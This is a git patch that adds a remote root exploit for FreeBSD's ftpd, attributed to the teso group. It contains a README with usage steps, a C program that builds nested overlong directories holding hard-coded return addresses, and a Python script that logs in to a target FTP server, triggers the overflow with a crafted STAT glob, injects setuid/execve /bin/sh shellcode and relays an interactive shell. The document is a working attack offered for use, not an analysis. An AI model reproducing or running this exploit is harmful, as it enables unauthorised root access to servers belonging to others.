From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 exploits/ftpd_exp/README |  5 +++++
 exploits/ftpd_exp/exp.c  | 25 +++++++++++++++++++++++++
 exploits/ftpd_exp/exp.py | 26 ++++++++++++++++++++++++++
 3 files changed, 56 insertions(+)
 create mode 100644 exploits/ftpd_exp/README
 create mode 100644 exploits/ftpd_exp/exp.c
 create mode 100644 exploits/ftpd_exp/exp.py

(limited to 'exploits/ftpd_exp')

diff --git a/exploits/ftpd_exp/README b/exploits/ftpd_exp/README
new file mode 100644
index 0000000..6a42370
--- /dev/null
+++ b/exploits/ftpd_exp/README
@@ -0,0 +1,5 @@
+Preliminary FreeBSD ftpd exploit by smiler / teso. Plz dont distribute outside
+teso. I'm sure there are better ways to do this...
+
+compile and run 'exp.c' on your homedir, and then run 'python exp.py' having
+altered it for your username and password. Offsets may need tweaking...
diff --git a/exploits/ftpd_exp/exp.c b/exploits/ftpd_exp/exp.c
new file mode 100644
index 0000000..5f80d44
--- /dev/null
+++ b/exploits/ftpd_exp/exp.c
@@ -0,0 +1,25 @@
+#include <stdio.h>
+#include <unistd.h>
+
+int
+main (int argc, char **argv)
+{
+	char	buf[512];
+
+	memset (buf, 'a', 255);
+	buf[255] = '\0';
+	if (mkdir (buf, 0700) < 0) {
+		perror ("mkdir");
+		return (-1);
+	}
+	chdir (buf);
+	mkdir (buf, 0700);
+	chdir (buf);
+	mkdir (buf, 0700);
+	chdir (buf);
+	*(unsigned int *)(buf + 156) = 0xbfbffa2d;
+	*(unsigned int *)(buf + 160) = 0xbfbff361;
+	*(unsigned int *)(buf + 164) = 0xbfbff361;
+	mkdir (buf, 0700);
+
+}
diff --git a/exploits/ftpd_exp/exp.py b/exploits/ftpd_exp/exp.py
new file mode 100644
index 0000000..86ec3cc
--- /dev/null
+++ b/exploits/ftpd_exp/exp.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+from ftplib import *
+import os,time,struct,sys
+from select import select
+
+shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'
+
+ftp = FTP()
+ftp.connect('192.168.1.2',21)
+ftp.login('username','password')
+
+time.sleep(6)
+print 'sending stat command'
+ftp.putcmd('STAT a*/*/*/*/')
+print 'sending shellcode'
+ftp.sock.send(shellcode)
+time.sleep(2)
+while 1:
+	heh = select([sys.stdin,ftp.sock],[],[])
+	for i in heh[0]:
+		if i == sys.stdin:
+			buf = sys.stdin.readline()
+			ftp.sock.send(buf)
+		if i == ftp.sock:
+			buf = ftp.sock.recv(1024)
+			sys.stdout.write(buf)
-- 
cgit v1.3